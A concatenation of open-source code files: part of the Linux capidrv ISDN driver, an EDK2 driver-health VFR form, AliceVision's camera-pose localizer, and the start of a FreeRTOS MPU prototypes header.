calling[0] = 0;
called[0] = 0;
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: connecting leased line\n", card->contrnr);
} else {
calling[0] = strlen(bchan->mynum) + 2;
calling[1] = 0;
calling[2] = 0x80;
strncpy(calling + 3, bchan->mynum, ISDN_MSNLEN);
called[0] = strlen(bchan->num) + 1;
called[1] = 0x80;
strncpy(called + 2, bchan->num, ISDN_MSNLEN);
}
capi_fill_CONNECT_REQ(&cmdcmsg,
global.ap.applid,
card->msgid++,
card->contrnr, /* adr */
si2cip(bchan->si1, bchan->si2), /* cipvalue */
called, /* CalledPartyNumber */
calling, /* CallingPartyNumber */
NULL, /* CalledPartySubaddress */
NULL, /* CallingPartySubaddress */
b1prot(bchan->l2, bchan->l3), /* B1protocol */
b2prot(bchan->l2, bchan->l3), /* B2protocol */
b3prot(bchan->l2, bchan->l3), /* B3protocol */
b1config(bchan->l2, bchan->l3), /* B1configuration */
NULL, /* B2configuration */
NULL, /* B3configuration */
NULL, /* BC */
NULL, /* LLC */
NULL, /* HLC */
/* BChannelinformation */
isleasedline ? AdditionalInfo : NULL,
NULL, /* Keypadfacility */
NULL, /* Useruserdata */
NULL /* Facilitydataarray */
);
if ((plcip = new_plci(card, (c->arg % card->nbchan))) == NULL) {
cmd.command = ISDN_STAT_DHUP;
cmd.driver = card->myid;
cmd.arg = (c->arg % card->nbchan);
card->interface.statcallb(&cmd);
return -1;
}
plcip->msgid = cmdcmsg.Messagenumber;
plcip->leasedline = isleasedline;
plci_change_state(card, plcip, EV_PLCI_CONNECT_REQ);
send_message(card, &cmdcmsg);
return 0;
}
case ISDN_CMD_ACCEPTD:
bchan = &card->bchans[c->arg % card->nbchan];
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: ISDN_CMD_ACCEPTD(ch=%ld) l2=%d l3=%d\n",
card->contrnr,
c->arg, bchan->l2, bchan->l3);
capi_fill_CONNECT_RESP(&cmdcmsg,
global.ap.applid,
card->msgid++,
bchan->plcip->plci, /* adr */
0, /* Reject */
b1prot(bchan->l2, bchan->l3), /* B1protocol */
b2prot(bchan->l2, bchan->l3), /* B2protocol */
b3prot(bchan->l2, bchan->l3), /* B3protocol */
b1config(bchan->l2, bchan->l3), /* B1configuration */
NULL, /* B2configuration */
NULL, /* B3configuration */
NULL, /* ConnectedNumber */
NULL, /* ConnectedSubaddress */
NULL, /* LLC */
NULL, /* BChannelinformation */
NULL, /* Keypadfacility */
NULL, /* Useruserdata */
NULL /* Facilitydataarray */
);
capi_cmsg2message(&cmdcmsg, cmdcmsg.buf);
plci_change_state(card, bchan->plcip, EV_PLCI_CONNECT_RESP);
send_message(card, &cmdcmsg);
return 0;
case ISDN_CMD_ACCEPTB:
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: ISDN_CMD_ACCEPTB(ch=%ld)\n",
card->contrnr,
c->arg);
return -ENOSYS;
case ISDN_CMD_HANGUP:
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: ISDN_CMD_HANGUP(ch=%ld)\n",
card->contrnr,
c->arg);
bchan = &card->bchans[c->arg % card->nbchan];
if (bchan->disconnecting) {
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: chan %ld already disconnecting ...\n",
card->contrnr,
c->arg);
return 0;
}
if (bchan->nccip) {
bchan->disconnecting = 1;
capi_fill_DISCONNECT_B3_REQ(&cmdcmsg,
global.ap.applid,
card->msgid++,
bchan->nccip->ncci,
NULL /* NCPI */
);
ncci_change_state(card, bchan->nccip, EV_NCCI_DISCONNECT_B3_REQ);
send_message(card, &cmdcmsg);
return 0;
} else if (bchan->plcip) {
if (bchan->plcip->state == ST_PLCI_INCOMING) {
/*
* just ignore, we a called from
* isdn_status_callback(),
* which will return 0 or 2, this is handled
* by the CONNECT_IND handler
*/
bchan->disconnecting = 1;
return 0;
} else if (bchan->plcip->plci) {
bchan->disconnecting = 1;
capi_fill_DISCONNECT_REQ(&cmdcmsg,
global.ap.applid,
card->msgid++,
bchan->plcip->plci,
NULL, /* BChannelinformation */
NULL, /* Keypadfacility */
NULL, /* Useruserdata */
NULL /* Facilitydataarray */
);
plci_change_state(card, bchan->plcip, EV_PLCI_DISCONNECT_REQ);
send_message(card, &cmdcmsg);
return 0;
} else {
printk(KERN_ERR "capidrv-%d: chan %ld disconnect request while waiting for CONNECT_CONF\n",
card->contrnr,
c->arg);
return -EINVAL;
}
}
printk(KERN_ERR "capidrv-%d: chan %ld disconnect request on free channel\n",
card->contrnr,
c->arg);
return -EINVAL;
/* ready */
case ISDN_CMD_SETL2:
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: set L2 on chan %ld to %ld\n",
card->contrnr,
(c->arg & 0xff), (c->arg >> 8));
bchan = &card->bchans[(c->arg & 0xff) % card->nbchan];
bchan->l2 = (c->arg >> 8);
return 0;
case ISDN_CMD_SETL3:
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: set L3 on chan %ld to %ld\n",
card->contrnr,
(c->arg & 0xff), (c->arg >> 8));
bchan = &card->bchans[(c->arg & 0xff) % card->nbchan];
bchan->l3 = (c->arg >> 8);
return 0;
case ISDN_CMD_SETEAZ:
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: set EAZ \"%s\" on chan %ld\n",
card->contrnr,
c->parm.num, c->arg);
bchan = &card->bchans[c->arg % card->nbchan];
strncpy(bchan->msn, c->parm.num, ISDN_MSNLEN);
return 0;
case ISDN_CMD_CLREAZ:
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: clearing EAZ on chan %ld\n",
card->contrnr, c->arg);
bchan = &card->bchans[c->arg % card->nbchan];
bchan->msn[0] = 0;
return 0;
default:
printk(KERN_ERR "capidrv-%d: ISDN_CMD_%d, Huh?\n",
card->contrnr, c->command);
return -EINVAL;
}
return 0;
}
static int if_command(isdn_ctrl *c)
{
capidrv_contr *card = findcontrbydriverid(c->driver);
if (card)
return capidrv_command(c, card);
printk(KERN_ERR
"capidrv: if_command %d called with invalid driverId %d!\n",
c->command, c->driver);
return -ENODEV;
}
static _cmsg sendcmsg;
static int if_sendbuf(int id, int channel, int doack, struct sk_buff *skb)
{
capidrv_contr *card = findcontrbydriverid(id);
capidrv_bchan *bchan;
capidrv_ncci *nccip;
int len = skb->len;
int msglen;
u16 errcode;
u16 datahandle;
u32 data;
if (!card) {
printk(KERN_ERR "capidrv: if_sendbuf called with invalid driverId %d!\n",
id);
return 0;
}
if (debugmode > 4)
printk(KERN_DEBUG "capidrv-%d: sendbuf len=%d skb=%p doack=%d\n",
card->contrnr, len, skb, doack);
bchan = &card->bchans[channel % card->nbchan];
nccip = bchan->nccip;
if (!nccip || nccip->state != ST_NCCI_ACTIVE) {
printk(KERN_ERR "capidrv-%d: if_sendbuf: %s:%d: chan not up!\n",
card->contrnr, card->name, channel);
return 0;
}
datahandle = nccip->datahandle;
/*
* Here we copy pointer skb->data into the 32-bit 'Data' field.
* The 'Data' field is not used in practice in linux kernel
* (neither in 32 or 64 bit), but should have some value,
* since a CAPI message trace will display it.
*
* The correct value in the 32 bit case is the address of the
* data, in 64 bit it makes no sense, we use 0 there.
*/
#ifdef CONFIG_64BIT
data = 0;
#else
data = (unsigned long) skb->data;
#endif
capi_fill_DATA_B3_REQ(&sendcmsg, global.ap.applid, card->msgid++,
nccip->ncci, /* adr */
data, /* Data */
skb->len, /* DataLength */
datahandle, /* DataHandle */
0 /* Flags */
);
if (capidrv_add_ack(nccip, datahandle, doack ? (int)skb->len : -1) < 0)
return 0;
capi_cmsg2message(&sendcmsg, sendcmsg.buf);
msglen = CAPIMSG_LEN(sendcmsg.buf);
if (skb_headroom(skb) < msglen) {
struct sk_buff *nskb = skb_realloc_headroom(skb, msglen);
if (!nskb) {
printk(KERN_ERR "capidrv-%d: if_sendbuf: no memory\n",
card->contrnr);
(void)capidrv_del_ack(nccip, datahandle);
return 0;
}
printk(KERN_DEBUG "capidrv-%d: only %d bytes headroom, need %d\n",
card->contrnr, skb_headroom(skb), msglen);
memcpy(skb_push(nskb, msglen), sendcmsg.buf, msglen);
errcode = capi20_put_message(&global.ap, nskb);
if (errcode == CAPI_NOERROR) {
dev_kfree_skb(skb);
nccip->datahandle++;
return len;
}
if (debugmode > 3)
printk(KERN_DEBUG "capidrv-%d: sendbuf putmsg ret(%x) - %s\n",
card->contrnr, errcode, capi_info2str(errcode));
(void)capidrv_del_ack(nccip, datahandle);
dev_kfree_skb(nskb);
return errcode == CAPI_SENDQUEUEFULL ? 0 : -1;
} else {
memcpy(skb_push(skb, msglen), sendcmsg.buf, msglen);
errcode = capi20_put_message(&global.ap, skb);
if (errcode == CAPI_NOERROR) {
nccip->datahandle++;
return len;
}
if (debugmode > 3)
printk(KERN_DEBUG "capidrv-%d: sendbuf putmsg ret(%x) - %s\n",
card->contrnr, errcode, capi_info2str(errcode));
skb_pull(skb, msglen);
(void)capidrv_del_ack(nccip, datahandle);
return errcode == CAPI_SENDQUEUEFULL ? 0 : -1;
}
}
static int if_readstat(u8 __user *buf, int len, int id, int channel)
{
capidrv_contr *card = findcontrbydriverid(id);
int count;
u8 __user *p;
if (!card) {
printk(KERN_ERR "capidrv: if_readstat called with invalid driverId %d!\n",
id);
return -ENODEV;
}
for (p = buf, count = 0; count < len; p++, count++) {
if (put_user(*card->q931_read++, p))
return -EFAULT;
if (card->q931_read > card->q931_end)
card->q931_read = card->q931_buf;
}
return count;
}
static void enable_dchannel_trace(capidrv_contr *card)
{
u8 manufacturer[CAPI_MANUFACTURER_LEN];
capi_version version;
u16 contr = card->contrnr;
u16 errcode;
u16 avmversion[3];
errcode = capi20_get_manufacturer(contr, manufacturer);
if (errcode != CAPI_NOERROR) {
printk(KERN_ERR "%s: can't get manufacturer (0x%x)\n",
card->name, errcode);
return;
}
if (strstr(manufacturer, "AVM") == NULL) {
printk(KERN_ERR "%s: not from AVM, no d-channel trace possible (%s)\n",
card->name, manufacturer);
return;
}
errcode = capi20_get_version(contr, &version);
if (errcode != CAPI_NOERROR) {
printk(KERN_ERR "%s: can't get version (0x%x)\n",
card->name, errcode);
return;
}
avmversion[0] = (version.majormanuversion >> 4) & 0x0f;
avmversion[1] = (version.majormanuversion << 4) & 0xf0;
avmversion[1] |= (version.minormanuversion >> 4) & 0x0f;
avmversion[2] |= version.minormanuversion & 0x0f;
if (avmversion[0] > 3 || (avmversion[0] == 3 && avmversion[1] > 5)) {
printk(KERN_INFO "%s: D2 trace enabled\n", card->name);
capi_fill_MANUFACTURER_REQ(&cmdcmsg, global.ap.applid,
card->msgid++,
contr,
0x214D5641, /* ManuID */
0, /* Class */
1, /* Function */
(_cstruct)"\004\200\014\000\000");
} else {
printk(KERN_INFO "%s: D3 trace enabled\n", card->name);
capi_fill_MANUFACTURER_REQ(&cmdcmsg, global.ap.applid,
card->msgid++,
contr,
0x214D5641, /* ManuID */
0, /* Class */
1, /* Function */
(_cstruct)"\004\002\003\000\000");
}
send_message(card, &cmdcmsg);
}
static void send_listen(capidrv_contr *card)
{
capi_fill_LISTEN_REQ(&cmdcmsg, global.ap.applid,
card->msgid++,
card->contrnr, /* controller */
1 << 6, /* Infomask */
card->cipmask,
card->cipmask2,
NULL, NULL);
listen_change_state(card, EV_LISTEN_REQ);
send_message(card, &cmdcmsg);
}
static void listentimerfunc(unsigned long x)
{
capidrv_contr *card = (capidrv_contr *)x;
if (card->state != ST_LISTEN_NONE && card->state != ST_LISTEN_ACTIVE)
printk(KERN_ERR "%s: controller dead ??\n", card->name);
send_listen(card);
mod_timer(&card->listentimer, jiffies + 60 * HZ);
}
static int capidrv_addcontr(u16 contr, struct capi_profile *profp)
{
capidrv_contr *card;
unsigned long flags;
isdn_ctrl cmd;
char id[20];
int i;
sprintf(id, "capidrv-%d", contr);
if (!try_module_get(THIS_MODULE)) {
printk(KERN_WARNING "capidrv: (%s) Could not reserve module\n", id);
return -1;
}
if (!(card = kzalloc(sizeof(capidrv_contr), GFP_ATOMIC))) {
printk(KERN_WARNING
"capidrv: (%s) Could not allocate contr-struct.\n", id);
return -1;
}
card->owner = THIS_MODULE;
init_timer(&card->listentimer);
strcpy(card->name, id);
card->contrnr = contr;
card->nbchan = profp->nbchannel;
card->bchans = kmalloc(sizeof(capidrv_bchan) * card->nbchan, GFP_ATOMIC);
if (!card->bchans) {
printk(KERN_WARNING
"capidrv: (%s) Could not allocate bchan-structs.\n", id);
module_put(card->owner);
kfree(card);
return -1;
}
card->interface.channels = profp->nbchannel;
card->interface.maxbufsize = 2048;
card->interface.command = if_command;
card->interface.writebuf_skb = if_sendbuf;
card->interface.writecmd = NULL;
card->interface.readstat = if_readstat;
card->interface.features = ISDN_FEATURE_L2_HDLC |
ISDN_FEATURE_L2_TRANS |
ISDN_FEATURE_L3_TRANS |
ISDN_FEATURE_P_UNKNOWN |
ISDN_FEATURE_L2_X75I |
ISDN_FEATURE_L2_X75UI |
ISDN_FEATURE_L2_X75BUI;
if (profp->support1 & (1 << 2))
card->interface.features |= ISDN_FEATURE_L2_V11096 |
ISDN_FEATURE_L2_V11019 |
ISDN_FEATURE_L2_V11038;
if (profp->support1 & (1 << 8))
card->interface.features |= ISDN_FEATURE_L2_MODEM;
card->interface.hl_hdrlen = 22; /* len of DATA_B3_REQ */
strncpy(card->interface.id, id, sizeof(card->interface.id) - 1);
card->q931_read = card->q931_buf;
card->q931_write = card->q931_buf;
card->q931_end = card->q931_buf + sizeof(card->q931_buf) - 1;
if (!register_isdn(&card->interface)) {
printk(KERN_ERR "capidrv: Unable to register contr %s\n", id);
kfree(card->bchans);
module_put(card->owner);
kfree(card);
return -1;
}
card->myid = card->interface.channels;
memset(card->bchans, 0, sizeof(capidrv_bchan) * card->nbchan);
for (i = 0; i < card->nbchan; i++) {
card->bchans[i].contr = card;
}
spin_lock_irqsave(&global_lock, flags);
card->next = global.contr_list;
global.contr_list = card;
global.ncontr++;
spin_unlock_irqrestore(&global_lock, flags);
cmd.command = ISDN_STAT_RUN;
cmd.driver = card->myid;
card->interface.statcallb(&cmd);
card->cipmask = 0x1FFF03FF; /* any */
card->cipmask2 = 0;
card->listentimer.data = (unsigned long)card;
card->listentimer.function = listentimerfunc;
send_listen(card);
mod_timer(&card->listentimer, jiffies + 60 * HZ);
printk(KERN_INFO "%s: now up (%d B channels)\n",
card->name, card->nbchan);
enable_dchannel_trace(card);
return 0;
}
static int capidrv_delcontr(u16 contr)
{
capidrv_contr **pp, *card;
unsigned long flags;
isdn_ctrl cmd;
spin_lock_irqsave(&global_lock, flags);
for (card = global.contr_list; card; card = card->next) {
if (card->contrnr == contr)
break;
}
if (!card) {
spin_unlock_irqrestore(&global_lock, flags);
printk(KERN_ERR "capidrv: delcontr: no contr %u\n", contr);
return -1;
}
/* FIXME: maybe a race condition the card should be removed
* here from global list /kkeil
*/
spin_unlock_irqrestore(&global_lock, flags);
del_timer(&card->listentimer);
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: id=%d unloading\n",
card->contrnr, card->myid);
cmd.command = ISDN_STAT_STOP;
cmd.driver = card->myid;
card->interface.statcallb(&cmd);
while (card->nbchan) {
cmd.command = ISDN_STAT_DISCH;
cmd.driver = card->myid;
cmd.arg = card->nbchan - 1;
cmd.parm.num[0] = 0;
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: id=%d disable chan=%ld\n",
card->contrnr, card->myid, cmd.arg);
card->interface.statcallb(&cmd);
if (card->bchans[card->nbchan - 1].nccip)
free_ncci(card, card->bchans[card->nbchan - 1].nccip);
if (card->bchans[card->nbchan - 1].plcip)
free_plci(card, card->bchans[card->nbchan - 1].plcip);
if (card->plci_list)
printk(KERN_ERR "capidrv: bug in free_plci()\n");
card->nbchan--;
}
kfree(card->bchans);
card->bchans = NULL;
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: id=%d isdn unload\n",
card->contrnr, card->myid);
cmd.command = ISDN_STAT_UNLOAD;
cmd.driver = card->myid;
card->interface.statcallb(&cmd);
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: id=%d remove contr from list\n",
card->contrnr, card->myid);
spin_lock_irqsave(&global_lock, flags);
for (pp = &global.contr_list; *pp; pp = &(*pp)->next) {
if (*pp == card) {
*pp = (*pp)->next;
card->next = NULL;
global.ncontr--;
break;
}
}
spin_unlock_irqrestore(&global_lock, flags);
module_put(card->owner);
printk(KERN_INFO "%s: now down.\n", card->name);
kfree(card);
return 0;
}
static int
lower_callback(struct notifier_block *nb, unsigned long val, void *v)
{
capi_profile profile;
u32 contr = (long)v;
switch (val) {
case CAPICTR_UP:
printk(KERN_INFO "capidrv: controller %hu up\n", contr);
if (capi20_get_profile(contr, &profile) == CAPI_NOERROR)
(void) capidrv_addcontr(contr, &profile);
break;
case CAPICTR_DOWN:
printk(KERN_INFO "capidrv: controller %hu down\n", contr);
(void) capidrv_delcontr(contr);
break;
}
return NOTIFY_OK;
}
/*
* /proc/capi/capidrv:
* nrecvctlpkt nrecvdatapkt nsendctlpkt nsenddatapkt
*/
static int capidrv_proc_show(struct seq_file *m, void *v)
{
seq_printf(m, "%lu %lu %lu %lu\n",
global.ap.nrecvctlpkt,
global.ap.nrecvdatapkt,
global.ap.nsentctlpkt,
global.ap.nsentdatapkt);
return 0;
}
static int capidrv_proc_open(struct inode *inode, struct file *file)
{
return single_open(file, capidrv_proc_show, NULL);
}
static const struct file_operations capidrv_proc_fops = {
.owner = THIS_MODULE,
.open = capidrv_proc_open,
.read = seq_read,
.llseek = seq_lseek,
.release = single_release,
};
static void __init proc_init(void)
{
proc_create("capi/capidrv", 0, NULL, &capidrv_proc_fops);
}
static void __exit proc_exit(void)
{
remove_proc_entry("capi/capidrv", NULL);
}
static struct notifier_block capictr_nb = {
.notifier_call = lower_callback,
};
static int __init capidrv_init(void)
{
capi_profile profile;
u32 ncontr, contr;
u16 errcode;
global.ap.rparam.level3cnt = -2; /* number of bchannels twice */
global.ap.rparam.datablkcnt = 16;
global.ap.rparam.datablklen = 2048;
global.ap.recv_message = capidrv_recv_message;
errcode = capi20_register(&global.ap);
if (errcode) {
return -EIO;
}
register_capictr_notifier(&capictr_nb);
errcode = capi20_get_profile(0, &profile);
if (errcode != CAPI_NOERROR) {
unregister_capictr_notifier(&capictr_nb);
capi20_release(&global.ap);
return -EIO;
}
ncontr = profile.ncontroller;
for (contr = 1; contr <= ncontr; contr++) {
errcode = capi20_get_profile(contr, &profile);
if (errcode != CAPI_NOERROR)
continue;
(void) capidrv_addcontr(contr, &profile);
}
proc_init();
return 0;
}
static void __exit capidrv_exit(void)
{
unregister_capictr_notifier(&capictr_nb);
capi20_release(&global.ap);
proc_exit();
}
module_init(capidrv_init);
module_exit(capidrv_exit);
| {
"pile_set_name": "Github"
} |
///** @file
//
// VFR to produce the formset used by BDS. This form only lists
// the Configure Required driver health instances.
//
// Copyright (c) 2013 - 2015, Intel Corporation. All rights reserved.<BR>
// SPDX-License-Identifier: BSD-2-Clause-Patent
//**/
#include "DriverHealthManagerVfr.h"
formset
guid = DRIVER_HEALTH_CONFIGURE_FORMSET_GUID,
title = STRING_TOKEN(STR_FORM_TITLE),
help = STRING_TOKEN(STR_FORM_HELP),
classguid = DRIVER_HEALTH_CONFIGURE_FORMSET_GUID,
form formid = DRIVER_HEALTH_FORM_ID,
title = STRING_TOKEN(STR_FORM_TITLE);
label LABEL_BEGIN;
label LABEL_END;
suppressif TRUE;
text
help = STRING_TOKEN(STR_NULL),
text = STRING_TOKEN(STR_NULL),
flags = INTERACTIVE,
key = QUESTION_ID_REFRESH_CONFIGURE;
endif;
endform;
endformset;
| {
"pile_set_name": "Github"
} |
// This file is part of the AliceVision project.
// Copyright (c) 2016 AliceVision contributors.
// Copyright (c) 2012 openMVG contributors.
// This Source Code Form is subject to the terms of the Mozilla Public License,
// v. 2.0. If a copy of the MPL was not distributed with this file,
// You can obtain one at https://mozilla.org/MPL/2.0/.
#include "SfMLocalizer.hpp"
#include <aliceVision/config.hpp>
#include <aliceVision/sfm/BundleAdjustmentCeres.hpp>
#include <aliceVision/sfm/BundleAdjustmentSymbolicCeres.hpp>
#include <aliceVision/robustEstimation/ACRansac.hpp>
#include <aliceVision/robustEstimation/LORansac.hpp>
#include <aliceVision/robustEstimation/ScoreEvaluator.hpp>
#include <aliceVision/matching/supportEstimation.hpp>
#include <aliceVision/multiview/resection/P3PSolver.hpp>
#include <aliceVision/multiview/resection/ResectionKernel.hpp>
#include <aliceVision/multiview/resection/Resection6PSolver.hpp>
#include <aliceVision/multiview/resection/ProjectionDistanceError.hpp>
#include <aliceVision/multiview/Unnormalizer.hpp>
#include <aliceVision/multiview/ResectionKernel.hpp>
namespace aliceVision {
namespace sfm {
bool SfMLocalizer::Localize(const Pair& imageSize,
const camera::IntrinsicBase* optionalIntrinsics,
ImageLocalizerMatchData& resectionData,
geometry::Pose3& pose,
robustEstimation::ERobustEstimator estimator)
{
// compute the camera pose (resectioning)
Mat34 P;
resectionData.vec_inliers.clear();
// setup the admissible upper bound residual error
const double precision =
resectionData.error_max == std::numeric_limits<double>::infinity() ?
std::numeric_limits<double>::infinity() :
Square(resectionData.error_max);
std::size_t minimumSamples = 0;
const camera::Pinhole* pinholeCam = dynamic_cast<const camera::Pinhole*>(optionalIntrinsics);
if(pinholeCam == nullptr || !pinholeCam->isValid())
{
// classic resection (try to compute the entire P matrix)
using SolverT = multiview::resection::Resection6PSolver;
using KernelT = multiview::ResectionKernel<SolverT, multiview::resection::ProjectionDistanceSquaredError, multiview::UnnormalizerResection, robustEstimation::Mat34Model>;
const KernelT kernel(resectionData.pt2D, resectionData.pt3D, imageSize.first, imageSize.second);
minimumSamples = kernel.getMinimumNbRequiredSamples();
// robust estimation of the Projection matrix and its precision
robustEstimation::Mat34Model model;
const std::pair<double,double> ACRansacOut = robustEstimation::ACRANSAC(kernel, resectionData.vec_inliers, resectionData.max_iteration, &model, precision);
P = model.getMatrix();
// update the upper bound precision of the model found by AC-RANSAC
resectionData.error_max = ACRansacOut.first;
}
else
{
// undistort the points if the camera has a distortion model
Mat pt2Dundistorted;
const bool hasDistortion = pinholeCam->hasDistortion();
if(hasDistortion)
{
const std::size_t numPts = resectionData.pt2D.cols();
pt2Dundistorted = Mat2X(2, numPts);
for(std::size_t iPoint = 0; iPoint < numPts; ++iPoint)
{
pt2Dundistorted.col(iPoint) = pinholeCam->get_ud_pixel(resectionData.pt2D.col(iPoint));
}
}
switch(estimator)
{
case robustEstimation::ERobustEstimator::ACRANSAC:
{
// since K calibration matrix is known, compute only [R|t]
using SolverT = multiview::resection::P3PSolver;
using KernelT = multiview::ResectionKernel_K<SolverT, multiview::resection::ProjectionDistanceSquaredError, multiview::UnnormalizerResection, robustEstimation::Mat34Model>;
// otherwise we just pass the input points
const KernelT kernel = KernelT(hasDistortion ? pt2Dundistorted : resectionData.pt2D, resectionData.pt3D, pinholeCam->K());
minimumSamples = kernel.getMinimumNbRequiredSamples();
// robust estimation of the Projection matrix and its precision
robustEstimation::Mat34Model model;
const std::pair<double, double> ACRansacOut = robustEstimation::ACRANSAC(kernel, resectionData.vec_inliers, resectionData.max_iteration, &model, precision);
P = model.getMatrix();
// update the upper bound precision of the model found by AC-RANSAC
resectionData.error_max = ACRansacOut.first;
break;
}
case robustEstimation::ERobustEstimator::LORANSAC:
{
// just a safeguard
if(resectionData.error_max == std::numeric_limits<double>::infinity())
{
// switch to a default value
resectionData.error_max = 4.0;
ALICEVISION_LOG_DEBUG("LORansac: error was set to infinity, a default value of "
<< resectionData.error_max << " is going to be used");
}
// use the P3P solver for generating the model
using SolverT = multiview::resection::P3PSolver;
using SolverLsT = multiview::resection::Resection6PSolver;
// use the six point algorithm as Least square solution to refine the model
using KernelT = multiview::ResectionKernel_K<SolverT, multiview::resection::ProjectionDistanceSquaredError, multiview::UnnormalizerResection, robustEstimation::Mat34Model, SolverLsT>;
// otherwise we just pass the input points
const KernelT kernel = KernelT(hasDistortion ? pt2Dundistorted : resectionData.pt2D, resectionData.pt3D, pinholeCam->K());
minimumSamples = kernel.getMinimumNbRequiredSamples();
// this is just stupid and ugly, the threshold should be always give as pixel
// value, the scorer should be not aware of the fact that we treat squared errors
// and normalization inside the kernel
// @todo refactor, maybe move scorer directly inside the kernel
const double threshold = resectionData.error_max * resectionData.error_max * (kernel.normalizer2()(0, 0) * kernel.normalizer2()(0, 0));
robustEstimation::ScoreEvaluator<KernelT> scorer(threshold);
const robustEstimation::Mat34Model model = robustEstimation::LO_RANSAC(kernel, scorer, &resectionData.vec_inliers);
P = model.getMatrix();
break;
}
default:
throw std::runtime_error("[SfMLocalizer::localize] Only ACRansac and LORansac are supported!");
}
}
const bool resection = matching::hasStrongSupport(resectionData.vec_inliers, resectionData.vec_descType, minimumSamples);
if(!resection)
{
ALICEVISION_LOG_DEBUG("Resection status is false:\n"
"\t- resection_data.vec_inliers.size() = " << resectionData.vec_inliers.size() << "\n"
"\t- minimumSamples = " << minimumSamples);
}
if(resection)
{
resectionData.projection_matrix = P;
Mat3 K, R;
Vec3 t;
KRt_from_P(P, &K, &R, &t);
pose = geometry::Pose3(R, -R.transpose() * t);
}
ALICEVISION_LOG_INFO("Robust Resection information:\n"
"\t- resection status: " << resection << "\n"
"\t- threshold (error max): " << resectionData.error_max << "\n"
"\t- # points used for resection: " << resectionData.pt2D.cols() << "\n"
"\t- # points validated by robust resection: " << resectionData.vec_inliers.size());
return resection;
}
bool SfMLocalizer::RefinePose(camera::IntrinsicBase* intrinsics,
geometry::Pose3& pose,
const ImageLocalizerMatchData& matchingData,
bool refinePose,
bool refineIntrinsic)
{
// Setup a tiny SfM scene with the corresponding 2D-3D data
sfmData::SfMData tinyScene;
// view
std::shared_ptr<sfmData::View> view = std::make_shared<sfmData::View>("", 0, 0, 0);
tinyScene.views.insert(std::make_pair(0, view));
// pose
tinyScene.setPose(*view, sfmData::CameraPose(pose));
// intrinsic (the shared_ptr does not take the ownership, will not release the input pointer)
std::shared_ptr<camera::IntrinsicBase> localIntrinsics(intrinsics->clone());
tinyScene.intrinsics[0] = localIntrinsics;
const double unknownScale = 0.0;
// structure data (2D-3D correspondences)
for(std::size_t i = 0; i < matchingData.vec_inliers.size(); ++i)
{
const std::size_t idx = matchingData.vec_inliers[i];
sfmData::Landmark landmark;
landmark.X = matchingData.pt3D.col(idx);
landmark.observations[0] = sfmData::Observation(matchingData.pt2D.col(idx), UndefinedIndexT, unknownScale); // TODO-SCALE
tinyScene.structure[i] = std::move(landmark);
}
BundleAdjustmentCeres BA;
BundleAdjustment::ERefineOptions refineOptions = BundleAdjustment::REFINE_NONE;
if(refinePose)
refineOptions |= BundleAdjustment::REFINE_ROTATION | BundleAdjustment::REFINE_TRANSLATION;
if(refineIntrinsic)
refineOptions |= BundleAdjustment::REFINE_INTRINSICS_ALL;
const bool success = BA.adjust(tinyScene, refineOptions);
if(!success)
return false;
pose = tinyScene.getPose(*view).getTransform();
if(refineIntrinsic)
intrinsics->assign(*localIntrinsics);
return true;
}
} // namespace sfm
} // namespace aliceVision
| {
"pile_set_name": "Github"
} |
/*
FreeRTOS V9.0.0 - Copyright (C) 2016 Real Time Engineers Ltd.
All rights reserved
VISIT http://www.FreeRTOS.org TO ENSURE YOU ARE USING THE LATEST VERSION.
This file is part of the FreeRTOS distribution.
FreeRTOS is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License (version 2) as published by the
Free Software Foundation >>>> AND MODIFIED BY <<<< the FreeRTOS exception.
***************************************************************************
>>! NOTE: The modification to the GPL is included to allow you to !<<
>>! distribute a combined work that includes FreeRTOS without being !<<
>>! obliged to provide the source code for proprietary components !<<
>>! outside of the FreeRTOS kernel. !<<
***************************************************************************
FreeRTOS is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. Full license text is available on the following
link: http://www.freertos.org/a00114.html
***************************************************************************
* *
* FreeRTOS provides completely free yet professionally developed, *
* robust, strictly quality controlled, supported, and cross *
* platform software that is more than just the market leader, it *
* is the industry's de facto standard. *
* *
* Help yourself get started quickly while simultaneously helping *
* to support the FreeRTOS project by purchasing a FreeRTOS *
* tutorial book, reference manual, or both: *
* http://www.FreeRTOS.org/Documentation *
* *
***************************************************************************
http://www.FreeRTOS.org/FAQHelp.html - Having a problem? Start by reading
the FAQ page "My application does not run, what could be wrong?". Have you
defined configASSERT()?
http://www.FreeRTOS.org/support - In return for receiving this top quality
embedded software for free we request you assist our global community by
participating in the support forum.
http://www.FreeRTOS.org/training - Investing in training allows your team to
be as productive as possible as early as possible. Now you can receive
FreeRTOS training directly from Richard Barry, CEO of Real Time Engineers
Ltd, and the world's leading authority on the world's leading RTOS.
http://www.FreeRTOS.org/plus - A selection of FreeRTOS ecosystem products,
including FreeRTOS+Trace - an indispensable productivity tool, a DOS
compatible FAT file system, and our tiny thread aware UDP/IP stack.
http://www.FreeRTOS.org/labs - Where new FreeRTOS products go to incubate.
Come and try FreeRTOS+TCP, our new open source TCP/IP stack for FreeRTOS.
http://www.OpenRTOS.com - Real Time Engineers ltd. license FreeRTOS to High
Integrity Systems ltd. to sell under the OpenRTOS brand. Low cost OpenRTOS
licenses offer ticketed support, indemnification and commercial middleware.
http://www.SafeRTOS.com - High Integrity Systems also provide a safety
engineered and independently SIL3 certified version for use in safety and
mission critical applications that require provable dependability.
1 tab == 4 spaces!
*/
/*
* When the MPU is used the standard (non MPU) API functions are mapped to
* equivalents that start "MPU_", the prototypes for which are defined in this
* header files. This will cause the application code to call the MPU_ version
* which wraps the non-MPU version with privilege promoting then demoting code,
* so the kernel code always runs will full privileges.
*/
#ifndef MPU_PROTOTYPES_H
#define MPU_PROTOTYPES_H
/* MPU versions of tasks.h API function. */
